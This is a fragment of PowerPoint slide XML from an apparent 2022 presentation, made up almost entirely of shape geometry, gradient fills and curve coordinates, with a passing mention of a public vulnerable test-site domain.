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D771A8-0F07-73C1-7E9F-8671E67E26A5}" v="53" dt="2022-02-02T09:25:12.963"/>
    <p1510:client id="{92CFFCD0-D265-4769-80F9-BAC11BE897CC}" v="1093" dt="2022-02-01T17:32:45.6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1122362"/>
            <a:ext cx="88760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5230134"/>
            <a:ext cx="48768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93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91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54169"/>
            <a:ext cx="2674301" cy="532279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854169"/>
            <a:ext cx="78867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93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0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420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156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156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80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095930"/>
            <a:ext cx="4507931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2938410"/>
            <a:ext cx="4507930" cy="33861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095930"/>
            <a:ext cx="4507932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2938410"/>
            <a:ext cx="4507932" cy="33861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1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50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829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05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75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4006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2630" y="6356349"/>
            <a:ext cx="30638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pPr/>
              <a:t>2/2/2022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099372" y="4308656"/>
            <a:ext cx="34712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6670" y="6356349"/>
            <a:ext cx="576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9790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87" r:id="rId6"/>
    <p:sldLayoutId id="2147483692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testasp.vulnweb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EF32ACB-37F7-4E27-BDBC-67A94864F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 on document with pen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E977651-3DDE-4FEF-9AC6-A68798EDC4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983" r="-2" b="14619"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="-5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9407223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1644657"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="355" y="1644565"/>
                  <a:pt x="86159" y="1700355"/>
                  <a:pt x="86513" y="1700264"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="161082" y="1670699"/>
                  <a:pt x="142250" y="1761584"/>
                  <a:pt x="363188" y="1718549"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="421311" y="1688016"/>
                  <a:pt x="409500" y="1752160"/>
                  <a:pt x="619737" y="1714179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="666768" y="1708155"/>
                  <a:pt x="877611" y="1701225"/>
                  <a:pt x="952828" y="1679261"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1012645" y="1676132"/>
                  <a:pt x="955273" y="1708575"/>
                  <a:pt x="1045737" y="1687476"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1159604" y="1699834"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1250039" y="1706770"/>
                  <a:pt x="1336366" y="1693157"/>
                  <a:pt x="1426802" y="1675434"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1672601" y="1626494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726515" y="1620470"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1752352" y="1610133"/>
                  <a:pt x="1752400" y="1635211"/>
                  <a:pt x="1817196" y="1618888"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866119" y="1579261"/>
                  <a:pt x="1945241" y="1611232"/>
                  <a:pt x="2128677" y="1571603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2165963" y="1544881"/>
                  <a:pt x="2230898" y="1577365"/>
                  <a:pt x="2282480" y="1556706"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2657441" y="1522638"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2682799" y="1521040"/>
                  <a:pt x="2703275" y="1516516"/>
                  <a:pt x="2742061" y="1515036"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2778834" y="1489821"/>
                  <a:pt x="2834023" y="1508470"/>
                  <a:pt x="2879519" y="1475354"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2896464" y="1466144"/>
                  <a:pt x="2950249" y="1455825"/>
                  <a:pt x="2961221" y="1464946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2972601" y="1465075"/>
                  <a:pt x="2985381" y="1458422"/>
                  <a:pt x="2991417" y="1469363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3001009" y="1482050"/>
                  <a:pt x="3038505" y="1451716"/>
                  <a:pt x="3034154" y="1469902"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3101520" y="1459869"/>
                  <a:pt x="3285629" y="1443218"/>
                  <a:pt x="3395606" y="1409166"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3488693" y="1378575"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3558057" y="1352566"/>
                  <a:pt x="3627420" y="1364218"/>
                  <a:pt x="3696783" y="1357041"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3730859" y="1359524"/>
                  <a:pt x="3716933" y="1376811"/>
                  <a:pt x="3755304" y="1384129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3801815" y="1390879"/>
                  <a:pt x="3934239" y="1393438"/>
                  <a:pt x="3975854" y="1397538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3987038" y="1400241"/>
                  <a:pt x="4000495" y="1396575"/>
                  <a:pt x="4004993" y="1408727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4012756" y="1423402"/>
                  <a:pt x="4053666" y="1401988"/>
                  <a:pt x="4046985" y="1418926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4076004" y="1404281"/>
                  <a:pt x="4096460" y="1435124"/>
                  <a:pt x="4119600" y="1443180"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4243935" y="1457770"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4255440" y="1456954"/>
                  <a:pt x="4270838" y="1452628"/>
                  <a:pt x="4284141" y="1453044"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4383379" y="1416239"/>
                  <a:pt x="4565782" y="1413189"/>
                  <a:pt x="4634032" y="1406427"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4709534" y="1410966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4853333" y="1386556"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4927053" y="1357674"/>
                  <a:pt x="4955577" y="1387664"/>
                  <a:pt x="5017526" y="1342769"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5137559" y="1314404"/>
                  <a:pt x="5201983" y="1276623"/>
                  <a:pt x="5377628" y="1257674"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5434069" y="1251585"/>
                  <a:pt x="5489066" y="1230096"/>
                  <a:pt x="5544786" y="1216307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5683952" y="1172101"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5734912" y="1165017"/>
                  <a:pt x="5821231" y="1173859"/>
                  <a:pt x="5850543" y="1173804"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5859829" y="1171771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903982" y="1166939"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5930620" y="1165457"/>
                  <a:pt x="5993266" y="1165013"/>
                  <a:pt x="6019658" y="1162880"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6031241" y="1147936"/>
                  <a:pt x="6045939" y="1148648"/>
                  <a:pt x="6062332" y="1154140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6097952" y="1139761"/>
                  <a:pt x="6137513" y="1143378"/>
                  <a:pt x="6181213" y="1135884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6221103" y="1110366"/>
                  <a:pt x="6255382" y="1106463"/>
                  <a:pt x="6302036" y="1098344"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6385687" y="1076615"/>
                  <a:pt x="6471562" y="1021176"/>
                  <a:pt x="6683117" y="1005514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6781911" y="979035"/>
                  <a:pt x="6790825" y="963546"/>
                  <a:pt x="6852738" y="943169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6837702" y="919509"/>
                  <a:pt x="6931877" y="892025"/>
                  <a:pt x="6974438" y="871545"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6992703" y="888092"/>
                  <a:pt x="7064070" y="773210"/>
                  <a:pt x="7096121" y="780007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7105663" y="767748"/>
                  <a:pt x="7261698" y="756569"/>
                  <a:pt x="7324189" y="714263"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7384393" y="694556"/>
                  <a:pt x="7402128" y="682136"/>
                  <a:pt x="7457351" y="661765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7496603" y="663858"/>
                  <a:pt x="7642629" y="575213"/>
                  <a:pt x="7685479" y="592038"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7686931" y="569644"/>
                  <a:pt x="7874521" y="535649"/>
                  <a:pt x="7882339" y="508221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7943736" y="485588"/>
                  <a:pt x="7970601" y="491292"/>
                  <a:pt x="8053860" y="456239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8137119" y="421186"/>
                  <a:pt x="8331457" y="295844"/>
                  <a:pt x="8381890" y="297908"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8456828" y="294978"/>
                  <a:pt x="8479249" y="251935"/>
                  <a:pt x="8536731" y="232375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8594212" y="212814"/>
                  <a:pt x="8565043" y="193112"/>
                  <a:pt x="8726778" y="180544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8768997" y="176132"/>
                  <a:pt x="8888892" y="178791"/>
                  <a:pt x="8939725" y="169551"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9031769" y="125098"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9091779" y="103744"/>
                  <a:pt x="9056470" y="144229"/>
                  <a:pt x="9215031" y="81573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9230259" y="79960"/>
                  <a:pt x="9332570" y="34397"/>
                  <a:pt x="9351147" y="26829"/>
                </a:cubicBez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793428C-8F10-4683-9136-B5C3CF15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224054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43000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="92000">
                <a:srgbClr val="000000">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="37000">
                <a:srgbClr val="000000">
                  <a:alpha val="32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11A7E51-5BB7-4A22-BC7D-1B317734F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407236" cy="1730341"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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46439 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1440261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586048 h 1857909"/>
              <a:gd name="connsiteX1" fmla="*/ 1049 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1857909 h 1857909"/>
              <a:gd name="connsiteX2" fmla="*/ 370426 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1702965 h 1857909"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1857909"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1857909"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1857909"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1857909"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1857909"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1857909"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1857909"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1857909"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1857909"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1857909"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1857909"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1857909"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1857909"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1857909"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1857909"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1857909"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1857909"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1857909"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1857909"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1857909"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1857909"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1857909"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1857909"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1857909"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1857909"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1857909"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1857909"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1857909"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1857909"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1857909"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1857909"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1857909"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1857909"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1857909"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1857909"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1857909"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1857909"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1857909"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1857909"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1857909"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1857909"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1857909"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1857909"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1857909"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1857909"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1857909"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1857909"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1857909"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1857909"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1857909"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1857909"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1857909"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1857909"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1857909"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1857909"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1857909"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1857909"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1857909"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1857909"/>
              <a:gd name="connsiteX62" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1586048 h 1857909"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1586048 h 1709819"/>
              <a:gd name="connsiteX1" fmla="*/ 93535 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1629820 h 1709819"/>
              <a:gd name="connsiteX2" fmla="*/ 370426 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1702965 h 1709819"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1709819"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1709819"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1709819"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1709819"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1709819"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1709819"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1709819"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1709819"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1709819"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1709819"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1709819"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1709819"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1709819"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1709819"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1709819"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1709819"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1709819"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1709819"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1709819"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1709819"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1709819"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1709819"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1709819"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1709819"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1709819"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1709819"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1709819"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1709819"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1709819"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1709819"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1709819"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1709819"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1709819"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1709819"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1709819"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1709819"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1709819"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1709819"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1709819"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1709819"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1709819"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1709819"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1709819"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1709819"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1709819"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1709819"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1709819"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1709819"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1709819"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1709819"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1709819"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1709819"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1709819"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1709819"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1709819"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1709819"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1709819"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1709819"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1709819"/>
              <a:gd name="connsiteX62" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1586048 h 1709819"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1586048 h 1629820"/>
              <a:gd name="connsiteX1" fmla="*/ 93535 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1629820 h 1629820"/>
              <a:gd name="connsiteX2" fmla="*/ 374830 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1574915 h 1629820"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1629820"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1629820"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
